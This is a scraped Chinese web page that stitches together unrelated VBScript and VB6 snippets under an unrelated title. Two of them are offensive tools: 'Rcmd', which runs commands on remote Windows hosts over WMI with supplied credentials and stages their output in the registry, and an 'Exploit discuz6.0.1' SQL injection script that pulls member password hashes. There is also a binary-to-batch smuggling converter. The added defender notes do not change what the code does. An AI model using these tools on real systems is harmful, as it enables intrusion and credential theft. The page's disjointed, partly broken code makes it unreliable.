神途脚本制作教程闻赚钱

发布时间:2021-06-09 来源:脚本之家 点击:

所有的设备名在系统表"sysdevices"里有记录,所有的数据库名在系统表"sysdatabases"里有记录。说明:作者对某些代码进行了修改。

电脑脚本录制

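Function ReadRegValue( myComputer, myRegPath, myRegValue )
' Reads one value from the registry of any WMI enabled computer,
' through the StdRegProv class in the root/default namespace.
'
' Arguments:
' myComputer   a computer name or IP address,
'              or a dot for the local computer
' myRegPath    a full registry key path, e.g.
'              HKEY_CLASSES_ROOT\.jpg or
'              HKLM\SOFTWARE\Microsoft\DirectX
' myRegValue   the value name to be queried, e.g.
'              InstalledVersion or "" for default
'              values
'
' The function returns an array with the following elements:
' ReadRegValue(0)   the computer name (the first argument)
' ReadRegValue(1)   the hive number (see const declarations)
' ReadRegValue(2)   the key path without the hive
' ReadRegValue(3)   the value name (the third argument)
' ReadRegValue(4)   the error number: 0 means no error
' ReadRegValue(5)   the data type of the result
' ReadRegValue(6)   the actual data, or the first element of an
'                   array of data for REG_BINARY or REG_MULTI_SZ
'                   (further elements follow at index 7, 8, ...)
'
' Failure shapes callers must handle:
' * Unparsable path, unknown hive, or failure to reach WMI: elements 1 and 2
'   both hold the unmodified myRegPath and elements 5 and 6 hold "-".
' * Failure while reading the data: elements 5 and 6 hold "".
' * Value name not present in the key: error number 0 with elements 5 and 6
'   left Empty, so test element 5 before trusting element 6.
'
' Security notes:
' * myComputer is concatenated into the WMI moniker unchanged. Pass only a
'   host name or address the caller has validated; never raw user input.
' * The connection impersonates the calling account, so a remote read runs
'   with the caller's rights against the target's WMI and registry ACLs.
'   Registry data can be sensitive; treat the returned data accordingly.
'
' Written by Rob van der Woude
'

    ' Standard housekeeping
    Const HKEY_CLASSES_ROOT   = &H80000000
    Const HKEY_CURRENT_USER   = &H80000001
    Const HKEY_LOCAL_MACHINE  = &H80000002
    Const HKEY_USERS          = &H80000003
    Const HKEY_CURRENT_CONFIG = &H80000005
    Const HKEY_DYN_DATA       = &H80000006 ' Windows 95/98 only

    Const REG_SZ                         = 1
    Const REG_EXPAND_SZ                  = 2
    Const REG_BINARY                     = 3
    Const REG_DWORD                      = 4
    Const REG_DWORD_BIG_ENDIAN           = 5
    Const REG_LINK                       = 6
    Const REG_MULTI_SZ                   = 7
    Const REG_RESOURCE_LIST              = 8
    Const REG_FULL_RESOURCE_DESCRIPTOR   = 9
    Const REG_RESOURCE_REQUIREMENTS_LIST = 10
    Const REG_QWORD                      = 11

    Dim arrRegPath, arrResult(), arrValueNames, arrValueTypes
    Dim i, objReg, strHive, valRegError, valRegType, valRegVal

    ' Assume no error, for now
    valRegError = 0

    ' Split the registry path at the first backslash into a hive part and
    ' the rest, and check that exactly two parts came back. (The delimiter
    ' was an empty string in the listing, which never yields two parts.)
    arrRegPath = Split( myRegPath, "\", 2 )
    If IsArray( arrRegPath ) Then
        If UBound( arrRegPath ) <> 1 Then valRegError = 5
    Else
        valRegError = 5
    End If

    ' Convert the hive string to a hive number. Skipped when the split
    ' already failed, because arrRegPath( 0 ) may not exist (empty path).
    If valRegError = 0 Then
        Select Case UCase( arrRegPath( 0 ) )
            Case "HKCR", "HKEY_CLASSES_ROOT"
                strHive = HKEY_CLASSES_ROOT
            Case "HKCU", "HKEY_CURRENT_USER"
                strHive = HKEY_CURRENT_USER
            Case "HKLM", "HKEY_LOCAL_MACHINE"
                strHive = HKEY_LOCAL_MACHINE
            Case "HKU", "HKEY_USERS"
                strHive = HKEY_USERS
            Case "HKCC", "HKEY_CURRENT_CONFIG"
                strHive = HKEY_CURRENT_CONFIG
            Case "HKDD", "HKEY_DYN_DATA"
                strHive = HKEY_DYN_DATA
            Case Else
                valRegError = 5
        End Select
    End If

    ' Abort if any error occurred, and return an error code
    If valRegError > 0 Then
        ReadRegValue = Array( myComputer, myRegPath, _
                              myRegPath, myRegValue, _
                              valRegError, "-", "-" )
        Exit Function
    End If

    ' Initiate custom error handling
    On Error Resume Next

    ' Create a WMI registry object
    Set objReg = GetObject( "winmgmts:{impersonationLevel=impersonate}!//" _
                          & myComputer & "/root/default:StdRegProv" )

    ' Abort on failure to create the object
    If Err Then
        valRegError = Err.Number
        Err.Clear
        On Error Goto 0
        ReadRegValue = Array( myComputer, myRegPath, _
                              myRegPath, myRegValue, _
                              valRegError, "-", "-" )
        Exit Function
    End If

    ' Get a list of all values in the registry path;
    ' we need to do this in order to find out the
    ' exact data type for the requested value
    objReg.EnumValues strHive, arrRegPath( 1 ), arrValueNames, arrValueTypes

    ' Abort on failure, returning an error code
    If Err Then
        valRegError = Err.Number
        Err.Clear
        On Error Goto 0
        ReadRegValue = Array( myComputer, myRegPath, _
                              myRegPath, myRegValue, _
                              valRegError, "-", "-" )
        Exit Function
    End If

    ' If no values were found, we'll need to retrieve a default value
    If Not IsArray( arrValueNames ) Then
        arrValueNames = Array( "" )
        arrValueTypes = Array( REG_SZ )
    End If

    ' Loop through all values in the list . . .
    For i = 0 To UBound( arrValueNames )
        ' . . . and find the one requested (value names are compared
        ' without regard to case)
        If UCase( arrValueNames( i ) ) = UCase( myRegValue ) Then
            ' Read the requested value's data type
            valRegType = arrValueTypes( i )
            ' Based on the data type, use the appropriate query to retrieve the data
            Select Case valRegType
                Case REG_SZ
                    objReg.GetStringValue strHive, arrRegPath( 1 ), _
                                          myRegValue, valRegVal
                    If Err Then valRegError = Err.Number
                Case REG_EXPAND_SZ
                    objReg.GetExpandedStringValue strHive, arrRegPath( 1 ), _
                                                  myRegValue, valRegVal
                    If Err Then valRegError = Err.Number
                Case REG_BINARY ' returns an array of bytes
                    objReg.GetBinaryValue strHive, arrRegPath( 1 ), _
                                          myRegValue, valRegVal
                    If Err Then valRegError = Err.Number
                Case REG_DWORD
                    objReg.GetDWORDValue strHive, arrRegPath( 1 ), _
                                         myRegValue, valRegVal
                    If Err Then valRegError = Err.Number
                Case REG_MULTI_SZ ' returns an array of strings
                    objReg.GetMultiStringValue strHive, arrRegPath( 1 ), _
                                               myRegValue, valRegVal
                    If Err Then valRegError = Err.Number
                Case REG_QWORD
                    objReg.GetQWORDValue strHive, arrRegPath( 1 ), _
                                         myRegValue, valRegVal
                    If Err Then valRegError = Err.Number
                Case Else
                    ' Types without a matching StdRegProv getter here
                    valRegError = 5
            End Select
            ' The requested name has been handled; no need to scan further
            Exit For
        End If
    Next

    ' Check if an error occurred
    If valRegError > 0 Then
        valRegType = ""
        valRegVal  = ""
        Err.Clear
    End If

    ' Return the data in an array. Branch on the data itself rather than on
    ' the type code: this never compares the "" error placeholder with a
    ' numeric constant and never calls UBound on something that is not an
    ' array (e.g. when a binary or multi-string getter hands back no array).
    If IsArray( valRegVal ) Then
        ' Registry data returned as an array (REG_BINARY, REG_MULTI_SZ)
        ' is appended element by element, starting at index 6
        ReDim arrResult( 6 + UBound( valRegVal ) )
        arrResult( 0 ) = myComputer
        arrResult( 1 ) = strHive
        arrResult( 2 ) = arrRegPath( 1 )
        arrResult( 3 ) = myRegValue
        arrResult( 4 ) = valRegError
        arrResult( 5 ) = valRegType
        For i = 0 To UBound( valRegVal )
            arrResult( 6 + i ) = valRegVal( i )
        Next
        ReadRegValue = arrResult
    Else
        ReadRegValue = Array( myComputer, strHive, arrRegPath( 1 ), _
                              myRegValue, valRegError, valRegType, valRegVal )
    End If

    ' Finished
    Set objReg = Nothing
    On Error Goto 0
End Function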


----lpszTitle—目录树上方的标题,用来给用户一些提示信息


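' Works around SendKeys not typing Chinese text: the text is placed on the
' clipboard first and then pasted into the target window with Ctrl+V.
Set WshShell = CreateObject("WScript.Shell")
code = "让SendKeys可以发送中文"
' NOTE: code is spliced into a cmd.exe command line without quoting. Keep it
' a fixed literal; text containing shell metacharacters (& | < > ^ %) from
' any outside source would be interpreted by cmd.exe.
' The third argument (True) waits for the command to finish, so the
' clipboard is filled before the paste below.
WshShell.Run "cmd.exe /c echo " & code & "| clip.exe", vbHide, True
' Run returns an exit code, which AppActivate cannot use to find a window;
' Exec exposes the ProcessID that AppActivate accepts.
Set oExec = WshShell.Exec("notepad")
WScript.Sleep 1000
WshShell.AppActivate oExec.ProcessID
' Paste, then {BS} removes the line break that echo appended to the text
WshShell.SendKeys "^v{BS}"
WScript.Quit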


主程序设计成如下格式:

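Private Sub Run_Step(bz As Integer)
    ' Main routine: runs the teaching step selected by bz.
    ' (Spacing and underscores restored; the listing had lost them.)
    Select Case bz
        Case 1
            Timer_step.Interval = 20000 ' how long this step stays on screen
            Timer_step.Enabled = True
            ' (control code for this step's teaching process goes here)
        Case 2
            ' ...
        Case 3
            ' ...
    End Select
End Sub

Private Sub Timer_step_Timer() ' timer event
    ' Each tick advances the step counter and re-enters the main routine.
    StepCount = StepCount + 1
    Run_Step StepCount ' call the main routine
End Sub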
这样,计时器Timer_Step每触发一次,将使变量StepCount的值增1,在调用过程Run_Step时进入下一步学习,而Timer_Step的触发时间可在上一步的程序中设定,具体的Interval值需要根据实际情况确定。


' Converts the file named by the first argument into "<file>.bat": a
' text-only batch file that, when run, writes a helper debug.vbs, pipes its
' output into debug.exe to rebuild the original bytes as debug.tmp, renames
' that to the original file name and deletes debug.vbs.
'
' Review note: encoding a binary as a script that rebuilds it on the
' destination is a way to carry arbitrary files through text-only channels.
' The artefacts visible below (debug.vbs, debug.tmp, cscript piped into
' debug.exe) are what to look for when triaging such a batch file.
fp=wscript.arguments(0)
' File-name part of fp. NOTE(review): the search string is empty as shown;
' presumably a "\" was lost when the listing was published - confirm.
fn=right(fp,len(fp)-instrrev(fp,""))
' Read the whole file as raw bytes (stream type 1) and record its length
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
' Low 16 bits of the length go to sll. NOTE(review): "sl65536" reads as an
' undeclared variable as shown; presumably the integer division sl\65536
' (high part of the length) lost its backslash - confirm.
sll=sl mod 65536:slh=sl65536
' Create/overwrite fp & ".bat" (mode 2 = writing, True = create if missing)
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
' First batch line starts the assignment  str="<hex digits>  in debug.vbs
.write "@echo str="""
for i=1 to sl
bt=ascb(midb(str,i,1))
' Two hex digits per byte: pad values below 16 with a leading zero
if bt<16 then .write "0"
.write hex(bt)
' Every 128 bytes: close the string with a line continuation, append the
' line to debug.vbs, and open a new echo line continuing the expression
if i mod 128=0 then .write """_>>debug.vbs"+vbcrlf+"@echo +"""
next
' Close the hex string, then emit the debug.vbs loop that prints debug.exe
' "e" (enter) commands: 24 bytes per line, addresses starting at hex 100
.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf"_
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"_
+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
' Emit the debug.exe commands that set BX/CX from slh/sll, name the output
' debug.tmp, write it and quit; then run the pipeline, rename debug.tmp to
' the original file name and delete debug.vbs
.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)_
+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with"_
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
end with


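Private Sub Form_Load()
    ' Shows the file-name part of a path: everything after the last "\".
    ' (Spacing and the "\" literal restored; the listing had lost them.)
    Dim m As Integer ' position of the last "\" in j
    Dim i As String, j As String
    j = "E:\Music\MyFavourite\001\Spring.mp3" ' sample path
    i = "\" ' the character to look for
    ' InStrRev searches from the end of the string (-1 is the default start),
    ' so one call is enough; the listing repeated this identical call inside
    ' a For loop over Len(j), which produced the same m every time.
    m = InStrRev(j, i, -1)
    ' Show what follows the last "\"; when none is found m is 0 and the
    ' whole string is shown
    Text1.Text = Right(j, Len(j) - m)
End Sub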

运行程序,文本框中的是不是明明白白地躺着"Spring.mp3"?试着改一改j变量,得到的结果是不是预期的?->


' Rcmd v1.01 (credited to NetPatch in the usage text below). Runs one command
' line on a remote Windows host through WMI with a user name and password
' taken from the command line, and optionally relays the command's output
' back through a registry value on that host.
'
' Review notes for defenders - artefacts this listing produces:
'  * a remote connection to root/cimv2 with explicit credentials, followed by
'    Win32_Process.Create of "cmd /c ..." (on the target such processes are
'    typically children of the WMI provider host - verify in your telemetry);
'  * a helper script %windir%\temp\read.vbs written on the target;
'  * command output staged in HKLM\SOFTWARE\Clients, value "cmd"
'    (multi-string), read back remotely and then deleted;
'  * the password is a command-line argument, so it is exposed to anything
'    that records process command lines on the operator's machine.
' Restricting remote WMI/DCOM to management hosts and alerting on the items
' above are the relevant controls.
'
' All runtime errors are ignored from here on, so failed steps are skipped
' silently rather than stopping the script.
On Error Resume Next
Set outstreem=Wscript.stdout
' Intended to relaunch under cscript in a console when started by
' wscript.exe. NOTE(review): the left side is lower-cased but the literal
' contains a capital W, so as written the comparison cannot be true.
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Set objShell=Wscript.CreateObject("Wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&Chr(34)&Wscript.ScriptFullName&Chr(34))
Wscript.Quit
End If
' Require at least four arguments: target, user name, password, command
If Wscript.arguments.Count<4 Then
usage()
Wscript.echo "Not enough Parameters."
Wscript.Quit
End If

ip=Wscript.arguments(0)
username=Wscript.arguments(1)
password=Wscript.arguments(2)
CmdStr=Wscript.arguments(3)
' Optional fifth argument; with exactly four arguments this read fails and,
' because errors are ignored, EchoStr is left unset
EchoStr=Wscript.arguments(4)
' Path prefix used only in the WQL query for read.vbs below
foldername="c:\\windows\\temp\"

wsh.echo "Conneting "&ip&" ...."
' Authenticate to the target's root/cimv2 namespace with the supplied account
Set objlocator=CreateObject("wbemscripting.swbemlocator")
Set objswbemservices=objlocator.connectserver(ip,"root/cimv2",username,password)
' NOTE(review): no routine named showerror appears in this listing (the one
' defined below is showerroronly); with errors ignored, this call does nothing
showerror(err.number)
' Start-up settings object for the remote process; ShowWindow is set to 12
Set Win_Process=objswbemservices.Get("Win32_ProcessStartup")
Set Hide_Windows=Win_Process.SpawnInstance_
Hide_Windows.ShowWindow=12
Set Rcmd=objswbemservices.Get("Win32_Process")
' Check whether the helper read.vbs already exists on the target
Set colFiles=objswbemservices.ExecQuery _
("Select * from CIM_Datafile Where Name='"&foldername&"read.vbs'")
If colFiles.Count=0 Then
wsh.echo "Not found read.vbs! Create Now!"
Create_read()
End If


' "0" as fifth argument: run the command directly, output is not collected.
' Otherwise run it through read.vbs, which stores the output in the registry.
' CmdStr is concatenated into the command line unmodified in both cases.
If EchoStr="0" Then
msg=Rcmd.create("cmd /c "&CmdStr,Null,Hide_Windows,intProcessID)
Else
msg=Rcmd.create("cmd /c cscript %windir%\temp\read.vbs """&CmdStr&"""",Null,Hide_Windows,intProcessID)
End If

' A return value of 0 from Create is reported as success
If msg=0 Then
wsh.echo "Command success..."
Else
showerror(Err.Number)
End If

' Fixed three-second wait before the output is fetched
wsh.echo "Please Wait 3 Second ...."
wsh.sleep(3000)
Set StdOut=Wscript.StdOut
' Second authenticated connection, to root/default, for the registry provider
Set oReg=objlocator.connectserver(ip,"root/default",username,password).Get("stdregprov")
' Read the staged output from HKLM (&H80000002) \SOFTWARE\Clients, value "cmd"
oReg.GetMultiStringValue &H80000002,"SOFTWARE\Clients","cmd" ,arrValues
wsh.echo String(79,"*")
wsh.echo cmdstr&Chr(13)&Chr(10)
'wsh.echo arrvalues
For Each strValue In arrValues
StdOut.WriteLine strValue
Next
' Remove the staging value afterwards; read.vbs is left on the target
oReg.DeleteValue &H80000002,"SOFTWARE\Clients","cmd"

Sub Create_read()
' Creates %windir%\temp\read.vbs on the target by running a chain of
' "cmd /c echo ... >> file" commands through Win32_Process.Create (Rcmd and
' Hide_Windows are set by the main script). The generated script, as written
' by the echo lines below:
'   1. runs "cmd /c " followed by its first argument and captures everything
'      the command writes to standard output;
'   2. stores that text as a multi-string value named "cmd" under
'      HKLM\SOFTWARE\Clients through the local StdRegProv.
' Review note: a read.vbs in the Windows temp directory with this content,
' and writes to that registry value, are host artefacts of this tool.
RunYN=Rcmd.create("cmd /c echo set ws=WScript.CreateObject(^""WScript.Shell^"")> %windir%\temp\read.vbs"_
&"&&echo str=ws.Exec(^""cmd /c ^""^&wscript.arguments(0)).StdOut.ReadAll:set ws=nothing>> %windir%\temp\read.vbs"_
&"&&echo Set oReg=GetObject(^""winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv^"")>> %windir%\temp\read.vbs"_
&"&&echo oReg.SetMultiStringValue ^&H80000002,^""SOFTWARE\Clients^"",^""cmd^"",Array(str) >> %windir%\temp\read.vbs",Null,Hide_Windows,intProcessID)
' Create returned 0: report success; otherwise hand over to the error routine.
' NOTE(review): showerror is not defined in this listing (see showerroronly)
If RunYN=0 Then
wsh.echo "read.vbs Created!!!"
Else
showerror(Err.Number)
End If

End Sub

Function showerroronly(errornumber)
    ' Reports the current Err object and ends the script when errornumber is
    ' non-zero; otherwise writes a single progress dot to the output stream
    ' held in outstreem. The text printed comes from Err, not the argument.
    Dim headline, detail
    If errornumber Then
        headline = "Error 0x" & CStr(Hex(Err.Number)) & " ."
        wsh.echo headline
        detail = Err.Description
        If detail <> "" Then wsh.echo "Error Description: " & detail & "."
        Wscript.Quit
    Else
        outstreem.Write "."
    End If
End Function


Sub usage()
    ' Prints the banner and the two supported invocation forms. Note that the
    ' password is a positional command-line argument in both forms.
    Dim rule, invocation
    rule = string(79,"*")
    invocation = "cscript " & wscript.scriptfullname & " targetIP username password Command"
    wsh.echo rule
    wsh.echo "Rcmd v1.01 by NetPatch"
    wsh.echo "Usage:"
    wsh.echo invocation
    wsh.echo invocation & " 0 //No echo"
    wsh.echo rule & vbcrlf
End Sub
自由幻想器用->


' Proof-of-concept listing labelled "Exploit discuz6.0.1" by its own banner.
' It builds a request body for a forum search action in which the searchid
' parameter carries a SQL injection payload, sends it and prints the response.
'
' Review notes for defenders:
'  * The listing is incomplete as published: objXML is never created or
'    opened in the visible lines, and strSite / strPath are assigned but not
'    used.
'  * Indicators in web logs: a searchid parameter containing "%cf'" followed
'    by UNION SELECT, a reference to the cdb_members table, and the
'    User-Agent value "wap".
'  * Mitigation: run a patched forum version, build the query with bound
'    parameters (or charset-aware escaping with one consistent connection
'    character set), and store passwords so that a leaked hash is not
'    directly usable.
Dim strUrl,strSite,strPath,strUid
showB()
Set Args=Wscript.Arguments
' Exactly three arguments are expected: site, path and uid (showU exits)
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
' Request body. searchid is closed with a quote preceded by the byte %cf and
' followed by a UNION SELECT that names the password column for the given uid.
' NOTE(review): the %cf byte before the quote looks like the multi-byte
' character-set technique for neutralising an escaping backslash - confirm.
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,passwordfromcdb_memberswhereuid=" & strUid &"*"
' Form-encoded POST headers; the User-Agent is set to "wap"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
' Print the raw response body
wscript.echo(objXML.ResponseText)
Sub showB()
    ' Prints the start-up banner: a rule line, two title lines, a rule line.
    Dim rule
    rule = "+--------------------------=====================------------------------------+"
    Wscript.Echo rule
    Wscript.Echo "Exploit discuz6.0.1"
    Wscript.Echo "Code By Safe3"
    Wscript.Echo rule
End Sub
Sub showU()
    ' Prints the usage text (script name followed by site, path and uid)
    ' between two rule lines, then ends the script.
    Dim rule, invocation
    rule = "+--------------------------=====================------------------------------+"
    invocation = " cscript " & Wscript.ScriptName
    Wscript.Echo rule
    Wscript.Echo "用法:"
    Wscript.Echo invocation & " site path uid"
    Wscript.Echo "例子:"
    Wscript.Echo invocation & " /forum/ 1 >result.txt"
    Wscript.Echo rule
    Wscript.Quit
End Sub
